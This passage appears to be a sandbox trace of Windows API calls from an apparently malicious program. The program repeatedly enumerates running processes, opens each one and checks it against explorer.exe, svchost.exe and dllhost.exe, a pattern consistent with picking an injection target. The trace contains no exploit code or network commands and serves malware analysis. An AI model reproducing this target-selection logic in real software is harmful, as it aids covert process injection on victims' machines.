Wow64Process=0x2cf764) returned 1 [0220.495] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.495] CloseHandle (hObject=0xec) returned 1 [0220.495] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0220.495] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0220.495] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0220.495] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0220.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0220.496] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.496] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.496] CloseHandle (hObject=0xec) returned 1 [0220.496] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0220.496] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0220.496] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0220.496] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0220.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0220.496] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.496] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.496] CloseHandle (hObject=0xec) returned 1 [0220.496] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0220.497] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0220.497] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0220.497] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0220.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0220.497] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.497] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.497] CloseHandle (hObject=0xec) returned 1 [0220.497] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0220.497] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0220.497] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0220.497] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0220.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0220.498] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.498] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.498] CloseHandle (hObject=0xec) returned 1 [0220.498] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0220.498] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0220.498] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0220.498] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0220.498] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0220.499] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0220.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0220.499] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0220.500] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0220.500] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.501] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0220.501] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.501] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.501] CloseHandle (hObject=0xec) returned 1 [0220.501] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0220.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0220.502] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.502] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.502] CloseHandle (hObject=0xec) returned 1 [0220.502] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0220.502] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0220.502] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0220.503] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.503] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.503] CloseHandle (hObject=0xec) returned 1 [0220.503] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0220.503] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.503] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0220.503] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.503] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.503] CloseHandle (hObject=0xec) returned 1 [0220.503] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.504] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0220.504] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0220.504] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.504] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.504] CloseHandle (hObject=0xec) returned 1 [0220.504] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0220.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0220.546] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.546] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0220.546] CloseHandle (hObject=0xec) returned 1 [0220.546] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0220.546] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0220.546] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0220.546] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0220.546] CloseHandle (hObject=0xe8) returned 1 [0220.547] Sleep (dwMilliseconds=0x3e8) [0221.575] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0221.578] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.578] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0221.578] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0221.579] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.579] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0221.579] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0221.580] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0221.580] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0221.581] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0221.581] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0221.582] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0221.582] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0221.583] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0221.583] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0221.584] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0221.584] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0221.585] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0221.585] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0221.586] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0221.586] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0221.587] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0221.587] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.587] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.587] CloseHandle (hObject=0xec) returned 1 [0221.587] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0221.588] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0221.588] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.588] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.589] CloseHandle (hObject=0xec) returned 1 [0221.589] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0221.589] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0221.590] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0221.590] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0221.590] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.590] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.590] CloseHandle (hObject=0xec) returned 1 [0221.590] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0221.590] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0221.590] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0221.590] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0221.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0221.591] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.591] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.591] CloseHandle (hObject=0xec) returned 1 [0221.591] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0221.591] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0221.591] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0221.591] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0221.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0221.592] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.592] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.592] CloseHandle (hObject=0xec) returned 1 [0221.592] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0221.592] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0221.592] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0221.592] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0221.592] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0221.593] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.593] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.593] CloseHandle (hObject=0xec) returned 1 [0221.593] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0221.593] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0221.593] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0221.593] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0221.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0221.593] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.593] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0221.593] CloseHandle (hObject=0xec) returned 1 [0221.593] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0221.593] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0221.593] lstrcmpiA 